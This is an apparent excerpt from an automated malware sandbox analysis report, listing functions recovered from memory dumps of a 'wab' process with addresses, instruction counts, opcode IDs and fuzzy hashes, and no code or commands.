                                                • Instruction Fuzzy Hash: CE21D676604204DFDB24DF14D998B26BFB5FB84315F24C96ADC0A4A391D336D84BC671
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00581850 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6312670de01ae900451805681f22f053e9a51500b4804ad837cf78dc0585339d
                                                • Instruction ID: 39b33990e53e2a164094c90c6e2327a1682926a3b98cd8b2fad181392139ad1f
                                                • Opcode Fuzzy Hash: 6312670de01ae900451805681f22f053e9a51500b4804ad837cf78dc0585339d
                                                • Instruction Fuzzy Hash: 1421FC30B00605CFDB14EB65C5696AE7BFABB89345F200469D805FB290EF359D42CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058A018 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f98a01122f9743f7751ee506f89e7df853fa1d06b62402be51df4875169488a1
                                                • Instruction ID: 5d06821e2dc48d3768f7def0455930ad7deba59654cea847cc2ce49419efdb61
                                                • Opcode Fuzzy Hash: f98a01122f9743f7751ee506f89e7df853fa1d06b62402be51df4875169488a1
                                                • Instruction Fuzzy Hash: FD215030E04219DBDB19DF64C55469EBBB2BF89350F20862AFC15BB390DB71AC45CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00584F60 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62deb9025bd28dbad3d52f4a2b7fdce6fd9a5cdcb84336255b2eb49a875e9543
                                                • Instruction ID: cf9f0edc6c725cea3228989ab83cba083fa312d5b8f650e99e522df4f3e648f7
                                                • Opcode Fuzzy Hash: 62deb9025bd28dbad3d52f4a2b7fdce6fd9a5cdcb84336255b2eb49a875e9543
                                                • Instruction Fuzzy Hash: F921E534600605CFDB54EB78C95CAAE7BF1FB88354B1044A9E806EB3A0EB759D058B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00580848 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f80c414fde7927e047a8599de856e3a555165c9fc97b44fabb536d5f9de2ef59
                                                • Instruction ID: a26e20b7016f008da266b197d91281e1d2012a6bf9e2527fcd7428a3eb00b69a
                                                • Opcode Fuzzy Hash: f80c414fde7927e047a8599de856e3a555165c9fc97b44fabb536d5f9de2ef59
                                                • Instruction Fuzzy Hash: B1115130B102185FEFA47A78C44476D3B91FB55321F205939E806EB292EE65DDC98FD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00581788 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6c09352fe3ccce42dc30e5c53c0423463d28708daf8ee331c8e5f7b617cee40
                                                • Instruction ID: 06e9e5907e864ad5abf765f67b0feddb4397f4dfdd9ce2d947b9919fda83236a
                                                • Opcode Fuzzy Hash: e6c09352fe3ccce42dc30e5c53c0423463d28708daf8ee331c8e5f7b617cee40
                                                • Instruction Fuzzy Hash: 95110675F106119FDB11AB78C9056AE7BA6FB88650F100929E909E7305EF38CD0387C5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00581450 Relevance: .1, Instructions: 61COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abc63c0585ccad8897b15849fdd81aed049ba3a48da9c517311611f851f3bb00
                                                • Instruction ID: 45c8a4e7c633f2c351015cd2107a32d59c10c614ec44fd11400d7e72ad9f7b0e
                                                • Opcode Fuzzy Hash: abc63c0585ccad8897b15849fdd81aed049ba3a48da9c517311611f851f3bb00
                                                • Instruction Fuzzy Hash: 8B116D71E106158FCF60AFB884466ADBBA8FF48320B24087ADD05F7252DA35C943CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 005807F8 Relevance: .1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d53180116f9ffd06b490fb1d5d1cbeaf3ff83c7992701f81dfd8804403ea5227
                                                • Instruction ID: 9d140adbe1d84b77ede21f6c99617f0467a2dbc38c354552cc7865d6e03239c7
                                                • Opcode Fuzzy Hash: d53180116f9ffd06b490fb1d5d1cbeaf3ff83c7992701f81dfd8804403ea5227
                                                • Instruction Fuzzy Hash: 1111A031A102144BEF917B68C4513AE3B91FB51326F156D26E809EF282EA24CCC98FC2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058E811 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 20385feb833f96b868ede941e42c838e1fe81b2750c15ceb2cc95c0b9c06c882
                                                • Instruction ID: 9d01837d81c659cd6ecd4e8ad0b9e12d1c5954c77d617a97fb1d18eda0cb753a
                                                • Opcode Fuzzy Hash: 20385feb833f96b868ede941e42c838e1fe81b2750c15ceb2cc95c0b9c06c882
                                                • Instruction Fuzzy Hash: F8115933F087D50BC716977488540A97F72AFD721071946ABD506C7292EE74DC85C391
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0055D02B Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2954988338.000000000055D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0055D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_55d000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5968d91267bf6586b03f83c2023b59e7ddc76ecfad10599616ae9c25f7858457
                                                • Instruction ID: 4ed004857b89f70ee2b685e8deb966a01126178c4e903e35502d6b2fcf3b9d16
                                                • Opcode Fuzzy Hash: 5968d91267bf6586b03f83c2023b59e7ddc76ecfad10599616ae9c25f7858457
                                                • Instruction Fuzzy Hash: FC11AC76504280CFCB21CF14D594B15BF71FB84314F24C6AADC494B6A6C33AD84ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00581460 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 89c6baffc7ee2fe322c59430c027ce5145f8f1e3127e8e3bd0c3d07815503fe0
                                                • Instruction ID: 854b89f4a1e88e674e865b605224f8654d78c5c7432625edc283b34002f24ac2
                                                • Opcode Fuzzy Hash: 89c6baffc7ee2fe322c59430c027ce5145f8f1e3127e8e3bd0c3d07815503fe0
                                                • Instruction Fuzzy Hash: 00015B31E006158BCF61BFB884555ADBBA8BF88320B24447AE905F7251EA39D942CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058A758 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a5b85481d974bb6316bda479016771992fdb8e2214e54299077a916cca5a8140
                                                • Instruction ID: 28e3377ab7de707f0b55947b4883d7806c83c9e3983b3422180ff7b2018f11f9
                                                • Opcode Fuzzy Hash: a5b85481d974bb6316bda479016771992fdb8e2214e54299077a916cca5a8140
                                                • Instruction Fuzzy Hash: 7301B530A002148BDB14EF55D84478ABFB5FFD4311F548564D80C5B29AEB70DD45CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058E8CB Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97f086d6171de4de09089363b36804526897085bcaa1411b1838fe392f35fc1e
                                                • Instruction ID: 2aa37dc081cb6063ef01e5963e33fc7dac947d63c96ddf130da96f9530e50bf7
                                                • Opcode Fuzzy Hash: 97f086d6171de4de09089363b36804526897085bcaa1411b1838fe392f35fc1e
                                                • Instruction Fuzzy Hash: E2F0A906B4D3D40FCB1223B4282809D2F712E9312175E40DBC899DF2EBE9288C4AC7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058F1F8 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d6b65553bc0b37e7f79e6449d6bbc85fd4f0bca54f7f76e20d494bf5a466654
                                                • Instruction ID: 7b6978ed60d93de04bf3ab53d27d95bad8eff22252982852967498da946bdb69
                                                • Opcode Fuzzy Hash: 7d6b65553bc0b37e7f79e6449d6bbc85fd4f0bca54f7f76e20d494bf5a466654
                                                • Instruction Fuzzy Hash: 87F0CD39B002268BDB20A6B9E94425E7AC6EBC4311F100939E40BDB264EA64DC464381
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058F200 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0ef35a5874deb58d357ff3c03ca24d77d7dde174e5fa01f1f1d7ffb80f82ff4
                                                • Instruction ID: 5be3d7bd475fad60e4a2526b103355f5a80cb99233fb9a328621b2d63bbfd3f9
                                                • Opcode Fuzzy Hash: e0ef35a5874deb58d357ff3c03ca24d77d7dde174e5fa01f1f1d7ffb80f82ff4
                                                • Instruction Fuzzy Hash: 61F0B43970022A8BDB3076BEE84465E7ADAEBC5721F100939F90BDB324EE25DC454391
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058F288 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2dc4337343d55d4027615ecfa13dce6e801319e4393113c8376c2cff0bd898b2
                                                • Instruction ID: 2b032ea7ca358e3b1701bb66b5a1df7c3b48a4abdf9143c65efa674f09b43529
                                                • Opcode Fuzzy Hash: 2dc4337343d55d4027615ecfa13dce6e801319e4393113c8376c2cff0bd898b2
                                                • Instruction Fuzzy Hash: E7F02779B002269FEB21A679E804649BBD2FF9032BF004939E40ECB228D725D9868741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00588FB8 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7736ed949544e375a70ba622efb88588d96038f32a19927632624bef2657e1b
                                                • Instruction ID: ae9613df110338bda7aedaec51b85599819524affdead186c6caacac0e6abe7e
                                                • Opcode Fuzzy Hash: e7736ed949544e375a70ba622efb88588d96038f32a19927632624bef2657e1b
                                                • Instruction Fuzzy Hash: F0F06870A6432DDFCB44EFB8E98199D7BF1EB80302F104669D0089B269FE346F448B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058E7D8 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08f627e4d40f1a6bac08e83bffb42bac243f6f787cf4074a9910da0916c40fee
                                                • Instruction ID: a33f446436757d07acba0a48315e7880cfd89d0c75321b3ee875d528dafcd44f
                                                • Opcode Fuzzy Hash: 08f627e4d40f1a6bac08e83bffb42bac243f6f787cf4074a9910da0916c40fee
                                                • Instruction Fuzzy Hash: AED02B31D083440BE3261228740E3697FE55B42318F15049BDC8757546D6701C80C3C1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0058E7E8 Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5c5d51e4b0ea776920380496c14be31d0abf800774cd73cf9220aca597b76644
                                                • Instruction ID: d727e709ddf06454ed313dc79f53bd687f62d2581c5cc6f31bf6d2993e40a19f
                                                • Opcode Fuzzy Hash: 5c5d51e4b0ea776920380496c14be31d0abf800774cd73cf9220aca597b76644
                                                • Instruction Fuzzy Hash: 0FD0A730A057108BC335E65DD508657BBEABB88710B544819E44787E00CB70FC00CBC0
                                                Uniqueness

                                                Uniqueness Score: -1.00%